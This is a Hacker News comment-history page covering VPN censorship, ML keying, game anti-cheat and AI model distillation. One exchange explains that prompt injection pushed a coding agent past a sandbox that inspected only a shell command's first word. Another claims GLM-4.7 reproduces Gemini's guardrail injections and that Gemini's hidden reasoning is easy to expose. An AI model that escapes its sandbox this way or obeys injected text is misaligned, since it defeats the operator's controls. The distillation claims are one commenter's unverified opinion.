Hacker News .hnnew | past | comments | ask | show | jobs | submit | orbital-decay's commentslogin

They removed VPNs at the request of the Russian government too (they have no operations in Russia). They are actively participating in government censorship.

>Snowflake Cortex AI Escapes Sandbox and Executes Malware

rolls eyes Actual content: prompt injection vulnerability discovered in a coding agent


Well there's the prompt injection itself, and the fact that the agent framework tried to defend against it with a "sandbox" that technically existed but was ludicrously inadequate.

I don't know how anyone with a modicum of Unix experience would think that examining the only first word of a shell command would be enough to tell you whether it can lead to arbitrary code execution.


>there’s no way that’s going to happen automatically

They train their model in a pretty straightforward way, it can also be used to capture the distortion as well, just use a non-monochrome (possibly moving) background optimized for this. It's a matter of effort and attention to detail during training (uneven green screen lighting, reflections, etc), not fundamental impossibility


Yes. But the main issue is in the way they formulate the problem. Their output is always a transparency mask, which of course will never handle distortions.

Right. Things like this are why it’s difficult integrating AI into professional movie pipelines— they’re super complex in ways AI cannot (yet) replicate for very good reasons that seem superfluous or trivially replaceable by people not familiar with them.

People in ML have this kind of belief rooted in the bitter lesson, that everything will eventually sort itself out given enough scale and data. That often makes them ignore the nuances of particular problem domains. CC is the opposite of that, it's just impossible to do everything at once.

It’s certainly a big part of the ML scene, but to a slightly lesser extent, a cultural facet of development in general. It’s not all bad! Many people have solved problems that nobody in their right mind would have attempted knowing the nitty gritty details; often the problem they solved wasn’t the one they intended to solve, or they only solve one small subset of it, but were still valuable advancements. Unfortunately, that also leads to reinforcing some people’s Dunning-Krueger-fueled insistence that they can solve another field’s difficult problems with a few thought experiments, and the only reason it hasn’t already been solved is because nobody thought to ask a developer as smart as them to momentarily consider the problem. Non-developers in tech often bear the brunt of it: moving into design after a decade of dev work, that irritating mindset was one of the reasons I left tech altogether a couple years later.

youd have to train it to also generate and st map of the distortions but creating the ground truth version of that from the synthetic data would add a lot more to render. also its very easy to plausibly fake, its not something humans are good at seeing and knowing its wrong. you can tell its completely missing but accurate vs just distorted in a plausible way is not something most brains are tuned to notice.

Sure, because they used monotone backgrounds and never really captured any distortion.

Color management (not just HDR which needs it) was also an afterthought. Calibration is still an issue.

> for reasons no one understands

Reasons are sadly typical for FOSS: from the start the devs were focused on their favorite use cases with no communication with end users to figure out theirs.


LLM spam, ironically

We've banned the account.

All: it's good to use AI in good ways, but posting generated comments to HN is a bad way and not allowed here.

https://hackernews.hn/newsguidelines.html#generated


Honeypots are used pretty often, sure. They're not enough, though useful.

Behavioral analysis is way harder in practice than it sounds, because most closet cheaters do not give enough signal to stand out, and the clusters are moving pretty fast. The way people play the game always changes. It's not the problem of metric selection as it might appear to an engineer, you need to watch the community dynamics. Currently only humans are able to do that.


If you play with friends and your cheats cooperate, I don't think honeypots would be fool-proof any longer. Unless you all get the same fake data.

>It's quite literally impossible to cheat anymore (in a way that disturbs normal players for more than a few games)

AKA the way that is easiest to detect, and the easiest way to claim that the game doesn't have cheaters. Behavioral analysis doesn't work with closet cheaters, and they corrupt the community and damage the game in much subtler ways. There's nothing worse than to know that the player you've competed with all this time had a slight advantage from the start.


In CS2, the game renders your enemies even though you can't see them (within some close range). The draw calls are theoretically interceptable (either on the software/firmware or other hardware level). Detecting this is essentially impossible because the game trusts that the GPU will render correctly.

if you cheated with wallhacks, post-game analysis can detect it.

And it is possible to silently put you into a cheating game match maker, so that you only ever match with other cheaters. This, to me, is prob. the better outcome than outright banning (which means the cheater just comes back with a new account). Silently moving them to a cheater queue is a good way to slow them down, as well as isolate them.


> post-game analysis can detect it.

Not with 100% accuracy. This means some legitimate players would be qualified as potentially cheating.

You don't have to play with wallhacks constantly on, you can toggle. And it doesn't detect cases where you're camping with an AWP and have 150ms response time instead of 200ms. Sometimes people are just having a good day.

> cheating game match maker

This is already a thing. In CS2, you have a Trust Factor. The lower your trust factor is, the bigger the chance you will be queued with/against cheaters.


Overwatch has made the decision that closest cheaters are not a problem and have actually protected a cheater in contenders, although they were forced to leave the competitive scene. None of it ever became public.

How do you know if none of it went public?

Word of mouth, but if you looked at their twitter and proof presented it was undeniable. If you want to go digging check a french contenders player that there are videos of with an instance of where the aimbot bugged out and started aiming directly at the center of a player with perfect reaction time and movements.

Every other competitive game regularly has public cases of cheaters being caught in pro games, overwatch doesn't.

Wait... Your proof that something has happened is that there is no proof?

Do you really think that's not sufficient for the purposes of this conversation?

Absolutely not. Making wildly speculative claims and saying that the lack of proof of it not happening is conspiracy theory territory

Why do you think this claim is "wildly" speculative as opposed to merely speculative?

We have two possible options here, it's pretty obvious which is the more likely one.

It is pretty ridiculous to suggest that nobody has ever been caught cheating in overwatch pro games.


Again, you are missing the point, just because something is "likely" to happen doesn't mean it did happen.

What you are basically asking is that we should provide a "negative proof", imagine me going through all the pro matches to prove my point that it did not happen (going in this extreme) when you can just show me a proof that it did happen.


It's you who's missing the point. You're engaging in ridiculous pedantry over whether or not people cheat in a very popular video game, take a break.

The reality is that it really couldn't matter less whether or not anyone has ever cheated in overwatch pro games, but we can pretty safely assume that somebody has.

Is this a topic that genuinely calls for greater precision than this? What's the benefit?


> you’re engaging in ridiculous pedantry over whether or not people cheat in a very popular video game

No, it’s abundantly clear that people cheat. We’re calling the GP comment out for claiming that overwatch turns a blind eye to cheaters and have ignored cheating in competitions.

> take a break

You’re the only person of the three of us getting very very worked up about it.

> is this a topic that genuinely calls for greater precision than this? What’s the benefit

Yes. It’s about the integrity of the discussion. There’s no point in being here if we can just post nonsense and have it accepted as truth.


>You’re the only person of the three of us getting very very worked up about it.

I'm really not? I'm just very surprised how strongly you guys are reacting to my anecdote which I never claimed to be proof of anything.

Look at how strongly worded your original comment was https://hackernews.hn/item?id=47390326

>Yes. It’s about the integrity of the discussion. There’s no point in being here if we can just post nonsense and have it accepted as truth.

This is truly insane. It was Xunjin who started insisting that my clearly indicated anecdata should be some sort of proof. I never made such a claim!

I never claimed that I was attempting to prove anything, that's something you two invented.

Is it genuinely your stance that to protect the "integrity of the discussion", all HN comments should be verifiable?


“Trust me bro”

Less skilled players can't distinguish better players from cheaters, and reports are usually abused and used in bad faith. Even a good-faith report really just means "I don't want to see this player for whatever reason". It's used as a signal of something in most systems but never followed outright in good games because players get a ton of useless reports.

Players in some games with custom servers run webs of trust (or rather distrust, shared banlists). They are typically abused to some degree and good players are banned across multiple servers by admins acting in bad faith or just straight up not caring. This rarely ends well.

I used to run popular servers for PvP sandbox games and big communities, and we used votebans/reports to evict good players from casual servers to anarchy ones, where they could compete, but a mod always had to approve the eviction using a pretty non-trivial process. This system was useless for catching cheaters, we got them in other ways. That's for PvP sandboxes - in e-sports grade games reports are useless for anything.


No, I wasn’t saying the human player would report them, I am saying the game itself would. If the game receives an update from another player showing them in a location that is too far away from their previous spot, for example, the client would know the other client is cheating, and would report it automatically.

That's pretty redundant then, and also subject to abuse. Server state is already an authoritative source of truth, and the server itself should be doing behavioral analysis (which many do, it's not enough). In real-life conditions of most games, what you see, what server sees, and what each other client sees are entirely different and unrelated things.

Yeah, that is why the reputation factor matters. If these games are relying on peer-to-peer connections for gameplay, then a client could lie and send different data to the server and to the other players. I acknowledge you can't trust the clients to report a cheater, because cheaters could report innocent users. My idea is that if you see the same player being reported by many clients across many games with random pairings, it becomes less and less likely that those reports are from other cheaters trying to get innocent players in trouble.

They most likely weren't, despite very dubious claims of Amodei and Altman and a certain twitter influencer running a pretty naive writing benchmark ("slop test") that is wrong in a very obvious manner. The only unambiguous cases of distillation were Gemini 2.0 experimentals being trained on Claude outputs, and GLM-4.7 being trained on Gemini 3.0 Pro. The rest are pretty different from each other.

What makes these cases unambiguous?

GLM-4.7 (specifically this version) repeats the guardrail prompt injections from 3.0 Pro, word-by-word, and never follows them, which is consistent with training on a reward-hacked CoT. Gemini 3.0 only discusses snippets from this injection in its native CoT (hidden by default, trivial to uncover), but GLM-4.7 was able to reconstruct it in full during training. The only possible reason for this is direct training on a large amount of examples of Gemini's CoT. Its structure and a lot of replies were identical in GLM too.

Gemini 2.0 Exp 1206 was reported to be indirectly trained on Claude's outputs with humans in between [1], which was pretty consistent with its outputs at the time. No other Gemini versions except two experimental ones were similar to Claude.

[1] https://techcrunch.com/2024/12/24/google-is-using-anthropics...


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: